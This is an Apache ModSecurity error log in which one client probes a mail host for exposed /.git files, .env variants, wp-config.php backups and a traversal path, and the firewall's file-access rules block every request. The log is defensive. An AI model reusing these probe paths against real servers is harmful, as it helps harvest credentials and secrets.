[Tue May 12 02:22:29.296430 2026] [security2:error] [pid 1691274:tid 1691285] [client 45.148.10.244:57134] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJyxVfdQaraX_prmqcZawAAAAg"]
[Tue May 12 02:22:29.296563 2026] [security2:error] [pid 1691274:tid 1691285] [client 45.148.10.244:57134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJyxVfdQaraX_prmqcZawAAAAg"]
[Tue May 12 02:22:29.296708 2026] [security2:error] [pid 1695975:tid 1695995] [client 45.148.10.244:57018] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/config"] [unique_id "agJyxdVI9ymHBxup74-HRQAAAJE"]
[Tue May 12 02:22:29.296827 2026] [security2:error] [pid 1695975:tid 1695995] [client 45.148.10.244:57018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/config"] [unique_id "agJyxdVI9ymHBxup74-HRQAAAJE"]
[Tue May 12 02:22:29.298372 2026] [security2:error] [pid 1695975:tid 1695992] [client 45.148.10.244:57178] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/refs/heads/main"] [unique_id "agJyxdVI9ymHBxup74-HRgAAAI4"]
[Tue May 12 02:22:29.298495 2026] [security2:error] [pid 1695975:tid 1695992] [client 45.148.10.244:57178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/refs/heads/main"] [unique_id "agJyxdVI9ymHBxup74-HRgAAAI4"]
[Tue May 12 02:22:29.299700 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.244:57162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/HEAD"] [unique_id "agJyxXo6NvB9WXx5V-50jQAAAQ4"]
[Tue May 12 02:22:29.299868 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.244:57162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/HEAD"] [unique_id "agJyxXo6NvB9WXx5V-50jQAAAQ4"]
[Tue May 12 02:22:31.305609 2026] [security2:error] [pid 1691274:tid 1691287] [client 45.148.10.244:57262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.old"] [unique_id "agJyx1fdQaraX_prmqcZfAAAAAo"]
[Tue May 12 02:22:31.305816 2026] [security2:error] [pid 1691274:tid 1691287] [client 45.148.10.244:57262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.old"] [unique_id "agJyx1fdQaraX_prmqcZfAAAAAo"]
[Tue May 12 02:22:31.306769 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.244:57282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.development"] [unique_id "agJyx7OxS7i6i_mT2NLDMwAAAEw"]
[Tue May 12 02:22:31.306918 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.244:57282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.development"] [unique_id "agJyx7OxS7i6i_mT2NLDMwAAAEw"]
[Tue May 12 02:22:31.335795 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.244:57266] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env"] [unique_id "agJyx3o6NvB9WXx5V-50lQAAARM"]
[Tue May 12 02:22:31.336000 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.244:57266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env"] [unique_id "agJyx3o6NvB9WXx5V-50lQAAARM"]
[Tue May 12 02:22:31.810520 2026] [security2:error] [pid 1707624:tid 1707693] [client 45.148.10.244:57220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxbOxS7i6i_mT2NLDKgAAAEs"]
[Tue May 12 02:22:31.820503 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.244:57054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxTue9Sp-pIv_Bb6KIAAAAUA"]
[Tue May 12 02:22:31.855537 2026] [security2:error] [pid 1691274:tid 1691278] [client 45.148.10.244:57080] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.bak"] [unique_id "agJyx1fdQaraX_prmqcZgAAAAAE"]
[Tue May 12 02:22:31.855723 2026] [security2:error] [pid 1691274:tid 1691278] [client 45.148.10.244:57080] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.bak"] [unique_id "agJyx1fdQaraX_prmqcZgAAAAAE"]
[Tue May 12 02:22:31.859778 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxdVI9ymHBxup74-HRAAAAJI"]
[Tue May 12 02:22:31.879114 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.local"] [unique_id "agJyx9VI9ymHBxup74-HTgAAAJI"]
[Tue May 12 02:22:31.879290 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.local"] [unique_id "agJyx9VI9ymHBxup74-HTgAAAJI"]
[Tue May 12 02:22:32.470828 2026] [security2:error] [pid 1707624:tid 1707683] [client 45.148.10.244:57300] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/local/.env"] [unique_id "agJyyLOxS7i6i_mT2NLDNQAAAEE"]
[Tue May 12 02:22:32.471034 2026] [security2:error] [pid 1707624:tid 1707683] [client 45.148.10.244:57300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/local/.env"] [unique_id "agJyyLOxS7i6i_mT2NLDNQAAAEE"]
[Tue May 12 02:22:32.472241 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.244:57316] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php.bak"] [unique_id "agJyyHo6NvB9WXx5V-50lwAAARI"]
[Tue May 12 02:22:32.472385 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.244:57316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php.bak"] [unique_id "agJyyHo6NvB9WXx5V-50lwAAARI"]
[Tue May 12 02:22:32.478620 2026] [security2:error] [pid 1707624:tid 1707702] [client 45.148.10.244:57298] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/refs/heads/master"] [unique_id "agJyyLOxS7i6i_mT2NLDNgAAAFQ"]
[Tue May 12 02:22:32.478775 2026] [security2:error] [pid 1707624:tid 1707702] [client 45.148.10.244:57298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/refs/heads/master"] [unique_id "agJyyLOxS7i6i_mT2NLDNgAAAFQ"]
[Tue May 12 02:22:32.483523 2026] [security2:error] [pid 1709071:tid 1709104] [client 45.148.10.244:57372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env~"] [unique_id "agJyyLvMumyrWMfSu7qjLQAAANE"]
[Tue May 12 02:22:32.483695 2026] [security2:error] [pid 1709071:tid 1709104] [client 45.148.10.244:57372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env~"] [unique_id "agJyyLvMumyrWMfSu7qjLQAAANE"]
[Tue May 12 02:22:32.484529 2026] [security2:error] [pid 1695975:tid 1695983] [client 45.148.10.244:57346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/backend/.env"] [unique_id "agJyyNVI9ymHBxup74-HUAAAAIU"]
[Tue May 12 02:22:32.484774 2026] [security2:error] [pid 1695975:tid 1695983] [client 45.148.10.244:57346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/backend/.env"] [unique_id "agJyyNVI9ymHBxup74-HUAAAAIU"]
[Tue May 12 02:22:32.499026 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.244:57322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.backup"] [unique_id "agJyyFfdQaraX_prmqcZgQAAAAY"]
[Tue May 12 02:22:32.499297 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.244:57322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.backup"] [unique_id "agJyyFfdQaraX_prmqcZgQAAAAY"]
[Tue May 12 02:22:32.501768 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.244:57294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJyyHo6NvB9WXx5V-50mAAAARU"]
[Tue May 12 02:22:32.501966 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.244:57294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJyyHo6NvB9WXx5V-50mAAAARU"]
[Tue May 12 02:22:32.505812 2026] [security2:error] [pid 1691274:tid 1691282] [client 45.148.10.244:57360] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php"] [unique_id "agJyyFfdQaraX_prmqcZggAAAAU"]
[Tue May 12 02:22:32.505946 2026] [security2:error] [pid 1691274:tid 1691282] [client 45.148.10.244:57360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/wp-config.php"] [unique_id "agJyyFfdQaraX_prmqcZggAAAAU"]
[Tue May 12 02:22:33.011828 2026] [security2:error] [pid 1691274:tid 1691298] [client 45.148.10.244:57224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyxVfdQaraX_prmqcZagAAABc"]
[Tue May 12 02:22:33.031106 2026] [core:error] [pid 1691274:tid 1691298] [client 45.148.10.244:57224] AH10244: invalid URI path (/../.env)
